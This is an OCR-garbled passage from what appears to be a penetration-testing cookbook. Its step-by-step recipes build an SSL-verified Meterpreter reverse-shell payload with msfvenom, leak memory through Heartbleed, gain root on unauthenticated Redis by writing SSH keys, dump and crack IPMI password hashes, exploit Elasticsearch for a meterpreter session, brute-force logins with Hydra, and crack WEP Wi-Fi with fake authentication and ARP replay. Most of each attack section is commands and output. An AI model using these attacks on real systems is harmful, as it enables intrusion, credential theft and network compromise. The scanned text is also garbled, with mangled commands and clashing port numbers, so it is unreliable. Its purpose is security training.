openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 
-keyout meterpreter.key -out meterpreter.crt 


The following screenshot shows the output for the preceding command: 


:~/Desktop# openssl reg -new -newkey rsa:4096 -days 365 -nodes -x509 
eyout meterpreter.key -out meterpreter.crt 
enerating a 4096 bit RSA private key 


ou are about to be asked to enter information that will be incorporated 
into your certificate request. 

hat you are about to enter is what is called a Distinguished Name or a DN. 
here are quite a few fields but you can leave some blank 

For some fields there will be a default value, 
If you enter '.', the field will be left blank. 





ountry Name (2 letter code) [AU]:IN 


We fill in the information such as country code and other information accordingly: 


| cat meterpreter.key meterpreter.crt > meterpreter.pem 


2. The previous command basically opens two files before and writes them into a single file. We then 
use our generated certificate to generate a payload using this: 


msfvenom -p windows/meterpreter/reverse winhttps LHOST=IP 
LPORT=443 HandlerSSLCert=meterpreter .pem 
StagerVerifySSLCert=true 

-f exe -o payload.exe 


The following screenshot shows the output for the preceding command: 


:~/Desktop# msfvenom -p windows/meterpreter/reverse winhttps HandlerSS 
ert=/root/Desktop/meterpreter.pem StagerVerifySSLCert=true LHOST=192.168.2.124 
PORT=4444 -f exe -o /root/Desktop/abcd.exe 
o platform was selected, choosing Mst::Module::PlatTorm::Windows from the payla 


o Arch selected, selecting Arch: x86 from the payload 

o encoder or badchars specified, outputting raw payload 
Payload size: 1128 bytes 

inal size of exe file: 73802 bytes 

Baved as: /root/Desktop/abcd.exe 





3. To set options, we use the following command: 


set HandlerSSLCert /path/to/pem_file 
set StagerVerifySSLCert true 


The following screenshot shows the example of the preceding command: 


msf exploit ( ) > set HandlerSSLCert /root/Desktop/meterpreter. 
pem 
HandlerSSLCert => /root/Desktop/meterpreter.pem 


msf exploit ( ) > set StagerVerifySSLCert true 
StagerVerifySSLCert => true 
msf exploit( Ny 





4. Now we run our handler, where we see that the stager verified the connection with the handler and 
then a connection was made: 


mst exploit ( ) > run 


Started HTTPS reverse handler on https://192.168.2.124:443 


Starting the payload handler... 





There's more... 


We can take this to a more advanced level by mentioning our own UUID when generating a payload using 
the -payloaduurpName= SWitch. Using this, even if another attacker has access to our certificate, they will not 
be able to hijack our session as the UUID will not match. 


A tale of a bleeding heart 


HeartBleed is a vulnerability in OpenSSL cryptography, which is said to be introduced in 2012 and 
publicly disclosed in 2014. It is a buffer over-read vulnerability where more data can be read than is 
allowed. 


In this recipe, you will learn how to exploit HeartBleed using Metasploit's auxiliary module. 


How to do it... 


To learn about HeartBleed follow the given steps: 


1. We start the msfconsole by typing this: 


| msfconsole 


The following screenshot shows the output for the preceding command: 





2. We then search for the HeartBleed auxiliary using the following command: 


| search heartbleed 


The following screenshot shows the output for the preceding command: 


Disclosure Da 
scription 


auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 
enSSL Heartbeat (Heartbleed) Information Leak 

auxiliary/server/openssl_ heartbeat _client_memory 2014-04-07 
enSSL Heartbeat (Heartbleed) Client Memory Exposure 





3. Next, we use the auxiliary using the following command: 


| use auxiliary/scanner/ssl/openssl_heartbleed 


4. We then see the options using the following command: 


| show options 


The following screenshot shows the output for the preceding command: 


msf auxiliary( ) > show options 
Module options (auxiliary/scanner/ssl/openssl_heartbleed) : 


Name Current Setting Required Description 


DUMPFILTER Pattern to filter 
before storing 

MAX_KEYTRIES Max tries to dump 

RESPONSE_ TIMEOUT Number of seconds 


server response 
RHOSTS ‘ The target addres 

identifier 
RPORT 443 The target port 
STATUS EVERY 5 How many retries u 
THREADS at The number of conc 
TLS_CALLBACK Nelat= yes Protocol to use, " 

aw TLS sockets (Accepted: None, SMIP, | JABBER; CPOPS. EP. FOS 
TLS_VERSION 1.0 TLS/SSL version to 





5. Now we set the RHOSTS to our target IP using this: 


| set RHOSTS x.x.x.x 


6. We then set the verbosity to true using this command: 


| set verbose true 


7. We then type run, where we should now see the data. This data often contains sensitive information, 
such as passwords, email IDs, and so on: 
6. 29:443 Heartbeat response, 65535 byte 


.29:443 Heartbeat response with leak 
.29:443 Printable info leaked: 


OH poe 
. Rollback tranaction changes... 





Redis exploitation 


Sometimes while pentesting, we may come across a Redis installation that was left public unintentionally. 
In an unauthenticated Redis installation, the simplest thing to do is to write random files. In this recipe, 
we will see how to get root access of Redis installations running without authentication. 


How to do it... 


To learn exploitation of Redis follow the given steps: 


1. We first telnet to the server and check whether a successful connection is possible or not: 


| telnet x.x.x.x 6379 


The following screenshot shows the output for the preceding command: 


:~# telnet 
Trying 
Connected to _ 


Escape character is '*%]'. 





2. We then terminate the telnet session. Next, we generate our SSH key using the following command: 


| ssh-keygen -t rsa -C youremail@example.com 


3. Then, we enter the file where we want to save it: 


Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa_ 





4. Our key is generated; now we need to write it on the server: 


our public key has been saved in ./id_rsa.pub. 
he key fingerprint is: 
6 :b8: :4e:3c:67:4d: f6:c9:0e:50: 
image is: 





5. We need to install redis-c1i for that; we can use the following command: 


| sudo apt-get install redis-tools 


6. Once it is installed, we go back to our generated key and add some random data before and after our 
key: 


| (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt 


The key.txt file is our new key file with new lines: 


:~# sudo apt-get install 
Reading package lists... Done 


Building dependency tree 
Reading state information... Done 
The following extra packages will be installed: 





7. Now we need to replace the keys in the database with ours. So we connect to the host using this: 


| redis-cli -h x.x.x.x 


8. Next we flush the keys using the following command: 


| redis-cli -h x.x.x.x -p 6350 flushall 


The following screenshot shows the output for the preceding command: 


edis# redis-cli -h -p 6350 flushall 





9. Now we need to set our keys into the database. We do this using the following command: 


| cat redis.txt | redis-cli -h x.x.x.x -p 6451 -x set bb 


10. Once that's done, we need to copy the uploaded key into the .ssh folder; first, we check the current 
folder with this: 


| config get dir 


11. Now we change our directory to /root/.ssh/: 


| config set dir /root/.ssh/ 


12. Next, we change the name of our file using set dbfilename "authorized_keys" and save using save: 


edis# redis-cli -h 
6350> config get dir 
"/fetc/redis-cluster/63560" 
635 config set dir /root/.ssh/ 


6350> config set dbfilename “authorized keys" 


6350> save 





6350> 


13. Let's try to SSH into the server now. We see that we are root: 


root@kali: ~ 





File Edit View Search Terminal Help 

i~# ssh -i redis/id_rsa root@l4 
he programs included with the Debian GNU/Linux system are free software; 
he exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright . 


Jebian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 


permitted by applicable law. 
Thu Nov 3 i 





Say no to SQL — owning MongoDBs 


MongoDB is a free open source cross-platform database program. It uses JSON-like documents with 
schemas. The default security configuration of MongoDB allows anyone to access data unauthenticated. In 
this recipe, we will see how to exploit this vulnerability. 


Getting ready 


MongoDB runs on port 27017 by default. To access MongoDB, we need to download and install the 
MongoDB client. There are multiple clients available; we will use Studio-3T, which can be downloaded 
from https://studio3t.com/. 


How to do it... 


Follow the steps to learn about it: 


1. Once installed, we open the app and choose Connect. 
2. Inthe window that opens up, we click on a new connection: 


3. Then, we choose a name, enter the IP address in the Server field, and click on Save: 


Enter a name for this connection: 


Authentication SSL  SSHTunnel Advanced 


Connection Type: Direct Connection 


Server: localhost Port: 27017 


Enter the host name or IP address and the port of your mongodb server 


From URI... Use this option to import connection details from a URI 
To URI... Use this option to export complete connection details to a URI 
Test Connection Cancel! 


4. Next, we simply select the database we just added from the list and click on Connect. On successful 
comnection, the database names will be displayed on the left-hand side and data will be displayed on 
the right-hand side. 


Embedded device hacking 


Intelligent Platform Management Interface (IPMI) is a technology that gives administrators almost 
total control over remotely deployed servers. 


IPMI may be found in most of the corporates while doing pentest. In this recipe, we will see how 
vulnerabilities in IPMI devices can be found. 


How to do it... 


To learn about IPMI follow the given steps: 


1. We start Metasploit: 


:~/Desktop# msfconsole 


IIIIII Le 

EN EN 
\ ci 

\ a 


UIE 


I love shells --egypt 


Love leveraging credentials? Check out bruteforcing 
in Metasploit Pro -- learn more on http://rapid7.com/metasploit 


=[ 
-- [ 1607 exploits - 914 auxiliary - 278 post 
[ 471 payloads - 39 encoders - 9 nops 
[ee 


] 
] 
] 
ree Metasploit Pro trial: http://r-7.co/trymsp ] 


aus SRY VS 


Wow 





2. We search for IPMI-related exploits using this command: 


| search ipmi 


The following screenshot shows the output for the preceding command: 


auxiliary/scanner/http/smt_ipmi_49152_ exposure 

Supermicro Onboard IPMI Port 49152 Sensitive File Exposure 
auxiliary/scanner/http/smt_ipmi_cgi_scanner 

Supermicro Onboard IPMI CGI Vulnerability Scanner 
auxiliary/scanner/http/smt_ipmi_static_cert scanner 

Supermicro Onboard IPMI Static SSL Certificate Scanner 
auxiliary/scanner/http/smt_ipmi_url_redirect_traversal 
Supermicro Onboard IPMI url redirect.cgi Authenticated Director 
IPMI 2.0 Cipher Zero Authentication Bypass Scanner 
auxiliary/scanner/ipmi/ipmi_dumphashes 2013-0 
IPMI 2.0 RAKP Remote SHA1 Password Hash Ret reival 
auxiliary/scanner/ipmi/ipmi_version 

IPMI Information Discovery 
exploit/lLinux/http/smt_ipmi_close_window_bof 2013-1 

Supermicro Onboard IPMI close window.cgi Buffer Overflow 
exploit/multi/upnp/libupnp_ssdp_overflow 2013-0 

Portable UPnP SDK unique_service name() Remote Code Execution 





3. We will use the IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval vulnerability; we 
choose the auxiliary. There are multiple exploits, such as CIPHER Zero, which can be tried as well: 


| use auxiliary/scanner/ipmi/ipmi_dumphashes 


4. Next, in order to see the options, we type this: 


| show options 


The following screenshot shows the output for the preceding command: 


msf auxiliary ( ) > show options 


CRACK_COMMON 
hey are obtained 
OUTPUT _HASHCAT_FILE 


ime} aiitene 
OUTPUT JOHN FILE 
ripper format 
PASS FILE /usr/share/metasploit - f ramework/data/wordlists/ipmi_password 
ine cracking, one per line 
RHOSTS 
er 


RPORT 623 





5. Here, we see that the auxiliary automatically attempts to crack the hashes it retrieves. 


We set RHOSTS and run. On successful exploitation, we will see the hashes retrieved and cracked: 


msf auxiliary( ) > exploit 


- IPMI - Hash found: root:0fc2bbcc38ccbefech955d2b4ced/dbdbe 
167497cb11404726f6F74:3f89af80c2e1500¢ fde4885831b620bc 72eal 186 
[+ ~~ :TPMI - Hash for user ‘root’ matches password ‘rootl23' 





Elasticsearch exploit 


Sometimes while doing a pentest, we may also come across some of the services running on various port 
numbers. One such service is what we will cover in this recipe. Elasticsearch is a Java-based open 
source search enterprise engine. It can be used to search any kinds of documents in real time. 


In 2015, an RCE exploit came for Elasticsearch, which allowed hackers to bypass the sandbox and 
execute remote commands. Let's see how it can be done. 


How to do it... 


The following steps demonstrate the exploitation of Elasticsearch: 


1. The default port is 9200 for Elasticsearch. We start the Metasploit console: 


Trouble managi 
in Metasploit 





2. We search for the Elasticsearch exploit using this command: 


| search elasticsearch 


The following screenshot shows the output for the preceding command: 


msf > search elasticsearch 


Matching Modules 


Disclosure Date 
Description 


auxiliary/scanner/elasticsearch/indices enum normal 
ElasticSearch Indices Enumeration Utility 

auxiliary/scanner/http/elasticsearch_ traversal normal 
ElasticSearch Snapshot API Directory Traversal 

exploit/multi/elasticsearch/script_mvel_rce 2013-12-09 excellent 
ElasticSearch Dynamic Script Arbitrary Java Execution 

exploit/multi/elasticsearch/search_groovy_ script 2015-02-11 excellent 
ElasticSearch Search Groovy Sandbox Bypass 

exploit/multi/misc/xdh_x_exec 2015-12-04 excellent 
Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution 





3. We choose the exploit in this case: 


| use exploit/multi/elasticsearch/search_groovy_script 


The following screenshot shows the output for the preceding command: 


exploit ( et RHOST 192.168.2.112 
=> 192.168.2.112 





5. We run the following command: 


| run 


6. We have our meterpreter session ready. 


meterpreter > 


See also 


e The Exploring the msfconsole recipe 


Good old Wireshark 


Wireshark is the world's most used network protocol analyzer. It is free and open source. It is mostly used 
for network troubleshooting and analysis. In this recipe, you will learn some basic things about Wireshark 
and how we can use it to analyze the network traffic in order to find out what information is actually 
flowing through our network. 


Getting ready 


Kali already has the tool preinstalled, so let's look at how to run it! 


How to do it... 


The following steps demonstrate the use of Wireshark: 


1. Wireshark can be opened using the wireshark Command: 


Welcome to Wireshark 
Capture 





..using this filter: |] | Enter a capture filter ... 





Wi-Fi: enO 

Thunderbolt Bridge: bridgeO 

p2po 

awdlO 

utunO 

Thunderbolt 1: en1 

vboxnet4 

Loopback: lo0 

vboxnetO 

vboxnet1 

vboxnet2 

vboxnet3 

gifo 

stfO 
® Cisco remote capture: cisco 
@® Random packet generator: randpkt 
@ SSH remote capture: ssh 


TTYIILTTFFITIIIE 


2. We select the interface we want to capture traffic on: 


—____f/{_______ The World's Most Popular Net 
WIRESHARK Version 1.12.6 (Git Rev Unknown from 





Interface List 

‘Live list of the capture interfaces 
(counts incoming packets) 
Start 


Choose one or more interfaces to capture from, then Start 


| 
Many 

§| Loopback: lo 

2 Inflog 

(|nfqueue 





© Capture Options 


Start a capture with detailed options 


3. Then, we click on Start. Display filters are used to see general packet filtering while capturing the 
network traffic. For example: tcp.port eq so as shown in the following screenshot: 


Filter: tep.port eq 80 né | Expression... Clear Apply Save 


No. 


Time 


. 23242006 


192. 


Source 


168. 200.146 


Destination 


Protocol Length Info 





- 25167300 
+ 25172200 
- 25213400 
-2523100( 
- 27625600 
- 27628300 
. 78061206 
. 7978700 216. 
. 7979610 192. 
-8194370( 192. 
-8196680( 192. 
- 8370870 216. 
-8371300( 192. 
-8374680( 192. 
- 8376070 216. 
- 8394370 216. 
- 8394640 192. 
-9557240 216. 


bale 
192. 
192. 
ily de 
ual 
192. 
192. 


18. 237.29 

168. 200.146 
168.200.146 
18.237.29 

18.237.29 

168. 200.146 
168. 200.146 
58.220.195 
168.200. 146 
168.200. 146 
168.200.146 
58.220.195 
168.200.146 
168.200.146 
58.220.195 
58.220.195 
168. 200.146 
58.220.195 


192. 
Liv. 
Reh se 
192. 
192. 
a ba ly se 
216. 
ihe ep 
216. 
216. 
216. 
192. 
216. 
216. 
192. 
192. 
216. 
ils Pa 


168.200. 146 
18.237.29 

Ri foie Paes | 

168. 200.146 
168.200.146 
18.237.29 

58.220.195 
168. 200.146 
58.220.195 
58.220.195 
58.220.195 
168. 200.146 
De 22061S5 
58.220.195 
168.200.146 
168. 200.146 
58.220.195 
168. 200.146 


TCP 60 80+52172 
TCP 54 52172480 
ocsP 500 Request 
TCP 60 80+52172 
OcsP 850 Response 
TCP 54 52172+80 
TCP 74 37755-+80 
TCP 60 80+37755 
TCP 54 37755-+80 
TCP 74 37756+80 
TCP 74 37757-80 
TCP 60 80+37756 
TCP 54 37756-80 
HTTP 532 GET / HIT 
TCP 60 80+37756 
TCP 60 80+37757 
TEcP 54 37757-80 
HTTP 898 HITP/1.1 : 


4. Applying the filter will show only the traffic on port so. If we want to view requests only froma 
particular IP, we select the request and right-click on it. 


5. Then, we navigate to Apply as Filter | Selected: 






82.2521340( 192.168 


300 2 9) 
301 282.2523100 117.18.237.29 






Mark Packet (toggle) 0+52172 [ACK] Seq=1 Ack=447 Win=64240 


302 282.2762560 117.18.237.29 192.1 Ignore Packet (toggle) esponse 
303 282.2762830 192.168.200.146 117.1 2172480 [ACK] Seq=447 Ack=797 Win=302¢ 
304 282.2796710( 192.168.200.146 52.88 Set Time Reference (toggle) pplication Data 

305 282.2799290 52.88.7.60 182-4 +e Shit... 43+34950 [ACK] Seq=2989 Ack=737 Win=6¢ 
306 282.3393620 52.88.7.60 192.1 erver Hello 

307 282.3393930 192.168.200.146 52.88 Edit Packet 49514443 [ACK] Seq=219 Ack=1441 Win=3] 
308 282.3402220 52.88.7.60 192.1 ertificate 

309 282.3402440 192.168.200.146 52.8g Packet Comment... 4951-443 [ACK] Seq=219 Ack=2881 Win=3¢ 
310 282.3405170 52.88.7.60 192.1 erver Key Exchange 

311 282.3405340 192.168.200.146 52.88 Manually Resolve Address 49514443 [ACK] Seq=219 Ack=2989 Win=3¢ 
312 282.3452630( 192.168.200.146 52.8 Tiant va Evehanan change Cipher Spec 
313 282.3455380( 52.88.7.60 12, Selected 9 Ack=345 Win=6¢ 
R214 282.R24RAGAA S?.8R.7.60 197.1 rvnted Handshake 


6. And we see that the filter has been applied: 











Filter: “ip.dst == 117.18.237.29 | v | Expression... Clear Apply Save 
Yo. Time Source Destination Protocol Length Info 
297 282.2324200( 192.168.200.146 117.18.237.29 TCP 74 52172480 [SYN] Seq=0 
299 282.2517220( 192.168.200.146 117.18.237.29 TCP 54 52172480 [ACK] Seq=1 
- 237.29 ae Request 
303 282.2762830( 192.168.200.146 117.18.237.29 TCP 54 52172480 [ACK] Seq=4. 
1111 291.0003350( 192.168.200.146 117.18.237.29 TCP 54 52172480 [FIN, ACK] : 
1128 291.0212190( 192.168.200.146 117.18.237.29 TCP 54 52172480 [ACK] Seq=4: 


7. Sometimes, we may want to look at the communication happening between two hosts at the TCP 
level. Following the TCP stream is a feature that allows us to view all the traffic from A to B and B 
to A. Let’s try to use it. From the menu, we choose Statistics and then we click on Conversations: 


Statistics Telephony Tools _ Internals 
Summary 
Comments Summary 
Show address resolution ! 


Protocol Hierarchy ] 


8. Inthe window that opens, we switch to the TCP tab. Here, we can see a list of IPs and the packets 
transferred between them. To view the TCP stream, we select one of the IPs and click on Follow 
Stream: 




















TCP: 9 Token Ring UDP: 20 USB WLAN 
ckets A€-E Bytes AB Rel Start Duration bps A>B 
3 5.0456 
8 974 12.381447000 50.2079 156.7 
3 180 12.381708000 5.9962 314.8 
92 102 976 12.538208000 6.7219 6890.8 
11 2 880 12.731574000 45.1859 354.0 
15 5 242 14.167754000 2.2191 4973.6 
14 5188 15.451513000 0.9748 11333.1 
11 4512 15.697085000 2.0721 4613.7 
47 50 961 17.267749000 1.6966 15202.1 
| Follow Stream | | Graph A>B | | Graph AB | | Close 








9. Here, we can see the data that was transferred via TCP: 


Follow TCP Stream (tcp.stream eq 18) = o x 


Stream Content 


iinietete Ol O2Ues Usher: 


Google Incl%O#..U....Google Internet Authority G20.. 


|170222092038Z. 

170517085800Z0f1.0...U....US1.0...U... 

(Californial.O...U... | 
Mountain View1.0. 

Google Incl.0. sel i * =geagie- GGMOVOss Shea Hea eB eee See eee OAc ee 

24S) 6s .024'. <3: .d)W. Mea ier re tis ae ee ace aeoterevove Winer avaincevave Sx. 

| Geese r0..n.. Ys Tangle: pee 


*, android.com. .*.appengine. google.com. .*.cloud.google.coM. .*.gcp.gvt2.com. .*.google- 
lanalytics.com. .*.google.ca..*.google. cl..* .google.co.in..*.google.co.jp..*.google.co.u 
k..*.google.com.ar. “*. google. com.au..* .google. com.br..* ‘google. com.co..*.google.com.mx.. 
*,google.com.tr..* ‘google.com.vn..*.google.de..*.google.es..*.google.fr..*.google.hu..*. 
google.it..*.google.nl..*.google.pl..*.google.pt. .*.googleadapis.com..*.googleapis.cn.. 
>, googLecommerce.com..*.googlevideo.com..*.gstatic.cn. 

. gstatic.com. 

pe. gvtl.com. 

pk. gvt2.com..*.metric.gstatic.com..*.urchin.com..*.url.google.com..*.youtube- 


Entire conversation (577978 bytes) ¥. 
Find | Save As Print ASCII EBCDIC Hex Dump C Arrays «) Raw 
Help Filter Out This Stream Close 





10. Capture filters are used to capture traffic specific to the filter applied; for example, if we only want 
to capture data from a particular host, we use the host x.x.x.x. 


11. To apply a capture filter, we click on Capture Options and in the new window that opens we will 
see a field named Capture Options. Here, we can enter our filters: 


VVIFCSHain. -apture wpeviis - = “~ 
Capture 
Capture Interface Link-layer header Prom. Mode Snaplen[B] Buffer[MiB] Mon. Mode Capture Filter 
v ethO Ethernet enabled 262144 2 n/a 
any Linux cooked enabled 262144 2 n/a 


Capture on all interfaces Manage Interfaces 


¥ Use promiscuous mode on all interfaces 


Capture Filter: v Compile selected BPFs 


Capture Files Display Options 
Bite: ' Browean \MW Update list of packets in real time 
: | _| Automatically scroll during live capture 
Use multiple files ¥ Use pcap-ng format 
4 Hide capture info dialog 
~~ Next file every l negabyte(s v 


12. Suppose we are investigating an exploitation of HeartBleed in the network. We can use the following 
capture filter to determine whether HeartBleed was exploited or not: 


tcp src port 443 and (tcp[((tcp[12] & OxFO) >> 4 ) * 4] = 0x18) 
and (tcp[((tcp[12] & O0xF0) >> 4 ) * 4 + 1] = 0x03) and 


(tcp[((tcp[12] & OxFO) >> 4 ) * 4 + 2] < 0x04) and 
((ip[2:2] - 4 * (ip[0] & OxOF) - 4 * ((tcp[12] & OxFO) >> 4) > 69)) 


There's more... 


Here are the links that will be helpful, and they contain a list of all filters in Wireshark. These filters can 
come in handy when performing in-depth packet analysis: 


® https://wiki.wireshark.org/Capture Filters 
@ =https://wiki.wireshark.org/FrontP age 


This is Sparta! 


Sparta is a GUI-based Python tool that is useful for infrastructure pentesting. It helps in scanning and 
enumeration. We can even import nmap outputs here. Sparta is very easy to use and automates a lot of 
information gathering and makes the process easier. In this recipe, you will learn how to use the tool to 
perform various scans on the network. 


Getting ready 


Kali already has the tool preinstalled, so let's look at how to run it! 


How to do it... 


To know more about Sparta, follow the given steps: 


1. We start by typing the sparta command: 


SPARTA 1.0.2 (BETA) - untitled - /root/Desktop/ 


File Help 





Scan | Brute 








f ) f ) 
Hosts | Services | Tools Services Scripts Information | Notes 


Click here to add 
host(s) to scope 


We will see the tool open up. 
2. Now we click on the left-hand side of the menu pane to add hosts: 


Add host(s) to scope 


IP Range HEpane weep. 


eg: 192.168.1.0/24 10.10.10.10-20 1.2.3.4 


~ Run nmap host discovery 


~¥ Run staged nmap scan 


Cancel Add to scope 





3. Inthe window, we enter the IP range we want to scan. 
4. Once we click on Add to scope, it automatically starts the basic process of running nmap, nikto, and 







SO on: 
Host Start time End time Status 
192.168.1.9 15 Feb 2017 00:42:28 Running 
192.168.1.1 15 Feb 2017 00:42:28 Running 


192.168.1.11 15 Feb 2017 00:42:28 Running 


5. We can see the discovered hosts on the left-hand side pane: 


6. On the right-hand side, in the Services tab, we will see the open ports and the services they are 


running: 


r- . bk = - = = - 
Services | Scripts | Information | Notes _ nikto (80/tcp) & 


7. Switching to the Nikto tab, we will see the output of Nikto being displayed for our selected host: 





. 
Hosts | Services Tools 


os Host 


192.168.1.1 





192.168.1.12 
192.168.1.13 


@ | {a 











“screenshot (80/tcp) ee 











Port Protocol State Name Version 


80 tcp open http nginx 1.6.2 


Bl | 





| Services ‘Scripts: information | Notes nikto (80/tcp) screenshc 


+ Server: nginx/1.6.2 

+ Server leaks inodes via ETags, header found with file /, fields: 0x588 
+ The anti-clickjacking X-Frame-Options header is not present. 

+ The X-XSS-Protection header is not defined. This header can hint to 
forms of XSS 

+ The X-Content-Type-Options header is not set. This could allow the 
site in a different fashion to the MIME type 

+ No CGI Directories found (use '-C all’ to force check all possible dirs} 
+ 7535 requests: 0 error(s) and 4 item(s) reported on remote host 

+ End Time: 2017-02-15 00:43:57 (GMT3) (55 seconds) 


+ 1 host(s) tested 


8. We can also see the screenshot of the page running on port so on the host: 

















| Services | Scripts i Information | Notes | nikto (80/tcp) GJ | screenshot (80/tcp) & 
| L 


| WGoogle 


One account. All of Google. 


Sign in with your Google Account 


Enter your ematt 











9. For services such as FTP, it automatically runs tools such as Hydra to brute force the logins: 














| Services | Scripts | Information Notes nikto (80/tcp) & | screenshot (80/tcp) bd | ftp-default (21/tcp) & 











Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for 
illegal purposes. 


Hydra (http://www.thc.org/thc-hydra) starting at 2017-02-15 00:45:43 

[DATA] max 10 tasks per 1 server, overall 64 tasks, 10 Login tries, ~O tries per task 
[DATA] attacking service ftp on port 21 

The session file ./hydra.restore was written. Type “hydra -R" to resume session. 


The session file ./hydra.restore was written. Type "hydra -R" to resume session. 
The session file ./hydra.restore was written. Type “hydra -R" to resume session. 
[STATUS] 138.00 tries/min, 138 tries in 00:01h, 4294967168 todo in 1193046:28h, 10 active 
The session file ./hydra.restore was written. Type “hydra -R" to resume session. 


10. On the left-hand side pane, on switching to Tools tab, we can see the output of every host toolwise. 
11. We can also perform a custom brute force attack by switching to the Brute tab: 


Scan | Brute 





Ta] 








IP |127.0.0.1 Port (22 Service |ssh |v | |___Run | 
Try blank password Try loginas password Loop aroundusers ™ Exit on first valid (J Verbose (J) Additional Options 


= z [ f 7 
\) Username root \) Username list Browse ‘© Found usernames 


\ Password | password \ Password list Browse ‘*) Found passwords Threads 16 lv | 











12. To runa full port scan or unicorn scan, we can right-click on the host. Go to the Portscan menu and 


choose the type of scan we want to run on the host: 







os Host 
@ 192.168.1.1 


@ 192.168.1.1 


@ 192.168,1.1,_ Mark as checked 

















Protocol State 
tcp open Ss 


fine apo hi 


Run unicornscan (full UDP) 

Run nmap (top 1000 quick UDP) 
Run nmap (full UDP) 

Run nmap (full TCP) 

Run nmap (fast UDP) 

Run nmap (fast TCP) 

Run nmap (staged) 





Wireless Attacks — Getting Past Aircrack-ng 


In this chapter, we will cover the following recipes: 


e The good old Aircrack 

Hands on with Gerix 

Dealing with WPAs 

Owning an employee account with Ghost Phisher 
Pixie dust attack 


Introduction 


As described on their official website: 


"Aircrack-ng is a complete suite of tools to assess Wi-Fi network security. 
It focuses on different areas of Wi-Fi security: 


e Monitoring: Packet capture and export of data to text files for further processing by third party 
tools 

e Attacking: Replay attacks, deauthentication, fake access points and others via packet injection 

e Testing: Checking Wi-Fi cards and driver capabilities (capture and injection) 

e Cracking: WEP and WPA PSK (WPA 1 and 2)" 


The good old Aircrack 


Aircrack is a software suite for networks, which consists of a network detector, packet sniffer, and 
WEP/WPA2 cracker. It is open source and is built for 802.11 wireless LANs (for more information visit h 
ttps://en.wikipedia.org/wiki/IEEE_802.11). It consists of various tools, such as aircrack-ng, airmon-ng, airdecap, aireplay- 
ng, packetforge-ng, and so on. 


In this recipe, we will cover a bit basic of cracking wireless networks with Aircrack suite. You will learn 
to use tools such as airmon-ng, aircrack-ng, airodump-ng, and so on to crack the password of wireless networks 
around us. 


Getting ready 


We will need to have a Wi-Fi hardware that supports packet injection. Alfa card by Alfa Networks, TP- 
Link TL-WN821N, and EDIMAX EW-7811UTC AC600 are some of the cards we can use. In this one, we 
are using Alfa card. 


How to do it... 


The following steps demonstrate the Aircrack: 


1. We type the airmon-ng command to check whether our card has been detected by Kali: 


root@kali:~# airmon-ng 


Driver Chipset 


(a W7401010]81—J6) Ralink Technology, Corp. RI28/70/RT30/0 





2. Next, we need to set our adapter to the monitor mode by using the following command: 


| airmon-ng start wlanOmon 


The following screenshot shows the output of the preceding command: 


root@kali:~# airmon-ng start wlanOmon 


PHY Interface Driver Chipset 


olan al wlanOmon rt2800usb Ralink Technology, Corp. RI28/70/RT3070 


(mac80211 monitor mode already enabled for [phyl]wlanOmon on [phy1]10) 





3. Now inorder to see what routers are running in the neighborhood, we use the following command: 


| airodump-ng wlanOmon 


The following screenshot shows the output of the preceding command: 


: 42 s ][ 2017-02-27 O1:33 


Oa 
a i 


PWR Beacons #Data, #/s 


CIPHER AUTH ESSID 


-33 aC) 
-49 ale) 
-54 il 
ele) 
mele) 
e}) 
-68 
els) 
TAC) 
-73 


CCMP PSK DIRECT-XG-BRAVIA 
CCMP PSK XSS 

CCMP PSK Anubha 

TKIP PSK AMAN 

CCMP PSK Hiker 

WEP MGMNT 

CCMP PSK Naoko 

CCMP PSK triband 

CCMP PSK GokulsDiner 
CCMP PSK KRITIKA 

CCMP PSK Akshay f.f 
CCMP PSK Maximum 

CCMP PSK Tenda_B32138 
CCMP PSK TP-LINK_EF1A 
TKIP PSK Batman 

CCMP PSK varun_EXT 
CCMP Neha 


— 


re PP 
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i emctmetmetmeimesme}metme}m—mecmecmetme) imme) 
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4. Here, we note the esszp of the network we want to crack; in our case, it's B8:c1:a2:07:8c:F1 and the 
channel number is 9. We stop the process by pressing Ctrl + C and leave the window open. 


5. Now we capture the packets using airodump-ng with the -w switch to write these packets to a file: 


| airodump-ng -w packets -c 9 --bssid B8:C1:A2:07:BC:F1 wlanOmon 
The following screenshot shows the output of the preceding command: 


root@kali: ~ 


CH 9 J][ Elapsed: 30 s ][ 2017-02-27 01:41 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


B8:C1:A2:07:BC:Fl -76 19 116 i : 9 54 WEP WEP MGMNT 


BSSID STATION ate Lost Frames Probe 





6. Now we need to watch the beacons and data column; these numbers start from o and increase as the 
packets are passed between the router and other devices. We need at least 20,000 initialization 
vectors to successfully crack the Wired Equivalent Privacy (WEP) password: 

7. To speed the process, we open another Terminal window and run aireplay-ng and perform a fake 
authentication using this command: 


aireplay-ng -1 © -e <AP ESSID> -a <AP MAC> -h <OUR MAC> wlanOmon 
{fake authentication} 


The following screenshot shows an example of the preceding command: 


-# aireplay-ng -1 0 -e MGMNT -a B8:C1:A2:07:BC:Fl -h @0:c@:ca:57:cd: fc wlan@mon 
“Waiting for beacon tra me 


(BSSID: B8:C1:A2:07:BC:F1) on channel 9 


Sending Authentication Request (Open System) [ACK] 
Authentication successful 

Sending Association Request [ACK] 

Association successful :-) (AID: 1) 





8. Now let's do the ARP packet replay using the following command: 


aireplay-ng -3 -b BSSID wlanOmon 


The following screenshot shows an example of the preceding command: 


oot@kali:-# aireplay-ng -3 -b B8:C1:A2:07:BC:F1l wlanOmon 
o source MAC (-h) specified. Using the device MAC (00:C0:CA:57:CD:FC) 
11:56:34 Waiting for beacon frame (BSSID: B8:C1:A2:07:BC:F1) on channel 9 
baving ARP requests in replay_arp-0227-015634.cap 
ou should also start airodump-ng to capture replies. 
7968 packets (got 24 ARP requests and 75 ACKs), s 
8083 packets (got 43 ARP reque and 109 ACKs), 
8213 packets (got 57 ARP re ests and 142 ACKs), 
8341 packets (got 80 ARP reque and 173 ACKs), 
8444 packets (got 84 ARP reques and 203 ACKs), 
8576 packets (got 99 ARP reques Fel ale! 237 ACKs) , 
